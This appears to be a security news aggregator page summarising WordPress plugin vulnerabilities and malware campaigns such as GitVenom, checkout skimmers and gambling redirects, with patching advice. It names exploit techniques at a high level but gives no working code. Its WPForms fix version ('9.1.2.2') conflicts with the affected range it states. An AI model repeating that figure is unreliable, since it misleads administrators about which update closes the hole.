CyberSecurity news
FlagThis - #wordpress
|
@Talkback Resources
//
Millions of WordPress websites face potential script injection attacks due to a critical vulnerability found in the Essential Addons for Elementor plugin, which is installed on over 2 million sites. The flaw, identified as CVE-2025-24752 with a high severity score of 7.1, allows attackers to execute reflected cross-site scripting (XSS) attacks. This is achieved by exploiting insufficient input sanitization within the plugin's password reset functionality, specifically through malicious URL parameters.
A fake WordPress plugin has also been discovered injecting casino spam, impacting website SEO. In a separate incident, cybersecurity researchers have flagged a malicious Python library on the PyPI repository, named 'automslc', which facilitates over 100,000 unauthorized music downloads from Deezer. The package bypasses Deezer's API restrictions by embedding hardcoded credentials and communicating with an external command-and-control server, effectively turning user systems into a botnet for music piracy. Recommended read:
References :
Pierluigi Paganini@Security Affairs
//
The GitVenom campaign, a sophisticated cyber threat, has been uncovered, exploiting GitHub repositories to spread malicious code and steal cryptocurrency. This campaign involves creating hundreds of repositories that appear legitimate but contain malicious code designed to infect users’ systems. The attackers craft these fake projects in multiple programming languages, including Python, JavaScript, C, C++, and C#, to lure unsuspecting developers. These projects often promise functionalities like automation tools but instead deploy malicious payloads that download additional components from attacker-controlled repositories.
The malicious components include a Node.js stealer that collects sensitive information like credentials and cryptocurrency wallet data, uploading it to the attackers. According to SecureListReport, a clipboard hijacker is also used to replace cryptocurrency wallet addresses, leading to significant financial theft. Kaspersky Labs discovered the GitVenom cybercrime campaign targeting GitHub users to steal cryptocurrency and credentials, with one attacker-controlled Bitcoin wallet receiving about 5 BTC (approximately $485,000) in November 2024. Recommended read:
References :
Pierluigi Paganini@securityaffairs.com
//
A sophisticated credit card skimmer malware campaign is targeting WordPress e-commerce websites, placing user payment information at risk. The malware operates by injecting malicious JavaScript code directly into the database tables of the content management system. This stealthy method allows the skimmer to evade traditional security detection systems, making it difficult to spot and remove. Once activated on the checkout page, the malware either hijacks existing payment fields or injects a fake payment form, closely mimicking legitimate payment processors. This form is designed to capture and record sensitive information such as credit card numbers, expiration dates, CVV numbers, and billing addresses.
The stolen data is then encoded using Base64 and encrypted with AES-CBC to make it appear harmless and harder to analyze. This encrypted data is subsequently sent to an attacker-controlled server using the navigator.sendBeacon function to avoid detection by the website user. The collected data, including payment card details and potentially other personal information, is then used for fraudulent transactions or sold on underground markets. Website owners are advised to examine custom HTML widgets, apply the latest security updates and patches, implement two-factor authentication, regularly review admin accounts, implement file integrity monitoring and use a website firewall for protection. Recommended read:
References :
@ciso2ciso.com
//
Critical security vulnerabilities have been discovered in the Fancy Product Designer plugin for WordPress, a popular premium plugin with over 20,000 sales that enables extensive product customization on WooCommerce sites. Patchstack researchers identified two unpatched critical flaws: an unauthenticated arbitrary file upload vulnerability (CVE-2024-51919) and an unauthenticated SQL injection vulnerability (CVE-2024-51818). These vulnerabilities place websites using the plugin at significant risk of unauthorized access and data breaches, as they allow for remote code execution and direct SQL database manipulation by malicious actors.
The file upload flaw is caused by inadequate input validation in the `save_remote_file` and `fpd_admin_copy_file` functions, which allows for uploading of PHP files and thus remote code execution. The SQL injection flaw originates from the `get_products_sql_attrs` function which fails to properly sanitize inputs, rendering the strip_tags function ineffective against such attacks. Website administrators using the Fancy Product Designer plugin are advised to immediately deactivate or remove it until a security patch is released by the vendor, Radykal. They should also monitor official channels for updates and implement WAFs to block exploitation attempts. Recommended read:
References :
@www.the420.in
//
A large-scale malware campaign has compromised over 35,000 websites by injecting malicious JavaScript. The injected scripts redirect users to Chinese-language gambling platforms, specifically under the "Kaiyun" brand. This attack utilizes obfuscated JavaScript payloads to hijack user browsers, replacing legitimate website content with full-page redirects.
This malicious campaign operates by embedding a one-line `` tag into the source code of affected websites. These scripts then reference domains like zuizhongjs[.]com and other similar URLs. Once loaded, these scripts dynamically inject further payloads, manipulating browser behavior and creating a full-screen overlay that redirects users to unlicensed gambling platforms in Mandarin, targeting users in regions where Mandarin is predominantly spoken. The attackers employ techniques such as string concatenation and Unicode escapes to conceal their activities and evade detection by automated security systems. Recommended read:
References :
@www.bleepingcomputer.com
//
A critical security flaw has been discovered in the W3 Total Cache plugin, a popular tool used by over one million WordPress websites. This vulnerability, tracked as CVE-2024-12365, allows attackers with even subscriber-level access to gain unauthorized access to sensitive data. The flaw stems from a lack of proper capability checks in the plugin's "is_w3tc_admin_page" function, enabling exploitation of sensitive information like nonce values. This could lead to information disclosure, excessive service consumption, and unauthorized requests to internal services, including metadata on cloud-based apps.
This vulnerability, which was publicly disclosed on January 13, 2025, poses a significant risk due to the widespread use of the plugin. Attackers can leverage this to access system data and perform unauthorized actions. While a patch has been released in version 2.8.2 of the W3 Total Cache plugin, many sites have yet to apply the update. Website administrators are urged to update to version 2.8.2 or later immediately to mitigate this high-severity risk, as well as review user access levels and conduct security audits. Recommended read:
References :
@gbhackers.com
//
References:
gbhackers.com
, securityonline.info
,
A critical vulnerability has been discovered in the popular UpdraftPlus: WP Backup & Migration Plugin, impacting over 3 million WordPress websites. This security flaw, identified as CVE-2024-10957, allows unauthenticated attackers to exploit a PHP Object Injection vulnerability through deserialization of untrusted input. The issue affects all versions of the plugin up to and including 1.24.11, with a patch released in version 1.24.12. The vulnerability has a high-risk CVSS score of 8.8 and could lead to severe consequences such as unauthorized file deletions, retrieval of sensitive user data, and even remote code execution. The exploit is triggered when an administrator performs a search and replace action within the plugin.
Website administrators using the UpdraftPlus plugin are urged to take immediate action and update to version 1.24.12 or later. It is essential for all WordPress users to review their installations, including all active plugins, to ensure they are updated with the latest versions. The ease of updating plugins via the WordPress dashboard reduces the window for potential attacks, and it is critical to stay informed about vulnerabilities like CVE-2024-10957 to prevent severe breaches. While no known proof of concept exists in the plugin itself, the existence of additional vulnerabilities in plugins and themes can escalate the risk. Recommended read:
References :
@gbhackers.com
//
A massive cyberattack has compromised over 10,000 WordPress websites, using them to distribute malware to both macOS and Windows users. The attackers exploited vulnerabilities in outdated WordPress versions and plugins, injecting malicious JavaScript code into the sites. This code redirects visitors to fake browser update pages, which then trick users into downloading malicious software. The campaign represents a significant escalation in threat sophistication, with the malware being delivered through client-side attacks via iframes. The malicious JavaScript dynamically injects the fake update pages, and also uses DNS prefetching to enhance the speed of loading these malicious domains.
The malware distributed includes AMOS (Atomic macOS Stealer), which targets macOS users by stealing sensitive data such as passwords and cryptocurrency wallet information. Windows users are targeted by SocGholish, a malware strain that acts as a downloader for additional malicious payloads. This coordinated approach on two operating systems suggests a sophisticated attack group or collaboration. Security experts warn that this is one of the first known cases of these specific malware strains being delivered through client-side attacks, and are urging website administrators to immediately update their WordPress installations and plugins, remove unused components, and review server logs for signs of compromise. Recommended read:
References :
@cve.mitre.org
//
References:
Pyrzout :vm:
, The Cyber Express
,
A critical vulnerability, identified as CVE-2024-11205, has been discovered in the WPForms plugin for WordPress. This security flaw impacts plugin versions 1.8.4 through 1.9.2.1. The issue arises from a missing authorization check within the wpforms_is_admin_page function, which allows attackers with even Subscriber-level privileges to perform unauthorized actions. Specifically, malicious actors could potentially refund payments and cancel subscriptions. This exploit could result in significant financial losses and disruptions for website owners using the affected WPForms plugin.
The vulnerability highlights the critical need for proactive security measures within WordPress environments. A fix is available in plugin version 9.1.2.2 or later, and administrators are urged to update immediately. Website operators should review user permissions, enable two-factor authentication, and closely monitor site activity for suspicious behavior. Regular backups are also essential to ensure data integrity in the event of a successful attack. CERT-In has issued alerts to WordPress users, emphasizing the urgency of this situation and the need to apply the latest updates. Recommended read:
References :
Rescana@Rescana
//
A critical vulnerability, tracked as CVE-2025-26909, has been identified in the WP Ghost plugin, a popular WordPress security plugin used by over 200,000 websites. This Local File Inclusion (LFI) flaw can escalate to Remote Code Execution (RCE), potentially allowing attackers to gain complete control over affected web servers without authentication. The vulnerability stems from insufficient validation of user-supplied input through the URL path, specifically within the `showFile` function invoked by the `maybeShowNotFound` function.
This flaw allows unauthenticated users to manipulate the URL to trigger file inclusion, potentially leading to arbitrary code execution, especially when the "Change Paths" feature is set to Lite or Ghost mode. Exploit techniques such as `php://filter` chains and leveraging `PHP_SESSION_UPLOAD_PROGRESS` can be used. Website administrators are strongly advised to immediately update their WP Ghost plugin to the latest version 5.4.02 to mitigate this severe security risk and implement additional security measures. In related news, GoDaddy Security researchers have uncovered a long-running malware operation named DollyWay, which targets visitors of infected WordPress sites. This campaign utilizes injected redirect scripts and a distributed network of TDS nodes hosted on compromised websites to redirect users to malicious sites. This highlights the broader issue of WordPress plugin vulnerabilities and the importance of maintaining strong security practices, including regular updates and vigilance. Recommended read:
References :
|